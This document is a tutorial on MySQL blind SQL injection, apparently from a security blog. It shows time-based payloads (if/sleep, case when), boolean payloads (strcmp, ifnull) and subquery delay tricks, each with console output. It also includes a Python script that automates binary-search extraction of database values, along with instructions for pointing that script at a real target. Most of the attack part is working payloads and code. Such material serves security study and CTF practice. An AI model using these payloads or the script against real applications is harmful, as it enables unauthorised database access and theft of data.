0x00 Blind injection
- Time-based blind injection
- Boolean-based blind injection
0x01 Simple time-based blind injection
- if()
if(expr1, expr2, expr3) returns expr2 when expr1 is true, otherwise expr3.
sleep(n) pauses the query for n seconds and returns 0, so when it sits in the where clause the condition evaluates to false and no rows come back: the delay, not the result set, is the signal.
String-slicing functions commonly paired with it: substr, substring, left.
mysql> select * from admin where id=1 and if((substr((select user()),1,1)='r'),sleep(5),1);
Empty set (5.01 sec)
mysql> select * from admin where id=1 and if((substr((select user()),1,1)='1r'),sleep(5),1);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
- case when ... then ... else ... end
mysql> select * from admin where id=1 and case when (substr((select user()),1,1)='r') then sleep(3) else 1 end;
Empty set (3.02 sec)
mysql> select * from admin where id=1 and case when (substr((select user()),1,1)='1r') then sleep(3) else 1 end;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
0x02 Boolean-based blind injection
The main approaches for boolean-based blind injection are regular-expression matching, operators and comparison functions.
Reference: https://www.anquanke.com/post/id/170626
- Using the comparison function strcmp()
strcmp(a, b) returns 0 when the two strings are equal and 1 or -1 otherwise. The comparison in the first argument yields 1 (true) or 0 (false), so strcmp(..., 1) is 0 when the guess is correct (Empty set) and strcmp(..., 0) is 1 (row returned). Keep the inverted sense in mind when reading the results.
mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),1);
Empty set (0.00 sec)
mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
- ifnull() function
ifnull(a, b) returns a when it is not null and b otherwise; here it simply passes through the 1/0 result of the comparison, which is enough to change the row count.
mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='1r'),0);
Empty set (0.00 sec)
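The queries in 0x01 and 0x02 test one literal guess per request. As an added example (not code from the original page), the Python script below automates the extraction for both sections: it builds the page's if()/sleep() and strcmp() payloads, but compares ascii() of the character against a threshold so a binary search recovers each character in 7 queries instead of up to 95 literal guesses. The target string `root@localhost` and the two fake_*_endpoint functions are constructed stand-ins for the vulnerable application, so the script runs offline; the time oracle classifies responses by an elapsed-time threshold rather than exact equality.

```python
"""Character-by-character extraction using the page's blind-injection primitives.

The target endpoint is simulated here (constructed, offline); swap the two
fake_*_endpoint functions for real HTTP requests to use it against a lab target.
"""
import re
from typing import Callable, Tuple

# Constructed stand-in for what `select user()` returns on the target.
SECRET = "root@localhost"


def time_payload(pos: int, threshold: int, delay: int = 2) -> str:
    """The page's if()/sleep() construct, but comparing ascii() of the character
    against a threshold so each query halves the search space instead of
    testing one literal guess such as ='r'."""
    return (f"1 and if((ascii(substr((select user()),{pos},1))>{threshold}),"
            f"sleep({delay}),1)")


def bool_payload(pos: int, threshold: int) -> str:
    """Boolean form wrapped in strcmp(...,0) as on the page: strcmp('1','0') is 1
    (row returned) and strcmp('0','0') is 0 (Empty set)."""
    return f"1 and strcmp((ascii(substr((select user()),{pos},1))>{threshold}),0)"


# --- simulated vulnerable backend (constructed; replaces the real database) ---
_PROBE = re.compile(r"substr\(\(select user\(\)\),(\d+),1\)\)>(\d+)")


def _evaluate(payload: str) -> bool:
    """Evaluate the injected comparison the way MySQL would against SECRET.
    substr() past the end of the string yields '' and ascii('') is 0."""
    m = _PROBE.search(payload)
    if m is None:
        raise ValueError("payload does not contain the expected probe")
    pos, threshold = int(m.group(1)), int(m.group(2))
    code = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
    return code > threshold


def fake_boolean_endpoint(payload: str) -> bool:
    """True when the row would be shown, False for 'Empty set'."""
    return _evaluate(payload)


def fake_timed_endpoint(payload: str, delay: int = 2) -> float:
    """Return the response time a real request would take: roughly `delay`
    seconds when sleep() fired, otherwise a short round trip. No real sleep."""
    return delay + 0.05 if _evaluate(payload) else 0.05


# --- oracles: one function per signal type, same signature ---
def boolean_oracle(pos: int, threshold: int) -> bool:
    return fake_boolean_endpoint(bool_payload(pos, threshold))


def time_oracle(pos: int, threshold: int, delay: int = 2) -> bool:
    # Decide by a threshold on elapsed time, never by exact equality; network
    # jitter adds to the delay but should not push a non-sleeping request past it.
    elapsed = fake_timed_endpoint(time_payload(pos, threshold, delay), delay)
    return elapsed >= delay


def extract(oracle: Callable[[int, int], bool], max_len: int = 64) -> Tuple[str, int]:
    """Recover the string one character at a time with a binary search over the
    ASCII range 0..127 (7 queries per character instead of up to 95 literal
    guesses). Returns (recovered string, number of queries sent)."""
    out, queries = [], 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # invariant: lo <= code <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(pos, mid):             # code > mid
                lo = mid + 1
            else:                            # code <= mid
                hi = mid
        if lo == 0:                          # ascii('') == 0: past the end
            break
        out.append(chr(lo))
    return "".join(out), queries


if __name__ == "__main__":
    for name, oracle in (("boolean", boolean_oracle), ("time", time_oracle)):
        value, n = extract(oracle)
        print(f"{name:8s} oracle: {value!r} in {n} queries")
```

Against a real target, replace fake_boolean_endpoint with a request whose response is checked for the marker that distinguishes a returned row from an empty result, and fake_timed_endpoint with a timed request; for the time oracle, re-send any request whose elapsed time lands near the threshold before trusting the bit.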
0x03 Subqueries
In time-based injection where the delay expression is evaluated once per row (for example when it is attached with or, or placed in order by as below), the total delay is multiplied by the number of rows. Wrapping sleep() in an uncorrelated subquery makes MySQL execute it once instead of per row, which shortens the delay; when brute-forcing a CTF challenge this advantage becomes obvious. The two timings below (2.00 sec against 6.05 sec for three rows) show the effect; confirm it on the target's MySQL version before relying on it.
mysql> select * from admin order by if((substr((select user()),1,1)='r'),(select 1 from(select sleep(2)) as b),password);
+------+-----------+----------+
| id | username | password |
+------+-----------+----------+
| 1 | admin | admin |
| 3 | admin'111 | 11 |
| 2 | cadmin | fdfggh |
+------+-----------+----------+
3 rows in set (2.00 sec)
mysql> select * from admin order by if((substr((select user()),1,1)='r'),sleep(2),password);
+------+-----------+----------+
| id | username | password |
+------+-----------+----------+
| 1 | admin | admin |
| 3 | admin'111 | 11 |
| 2 | cadmin | fdfggh |
+------+-----------+----------+
3 rows in set (6.05 sec)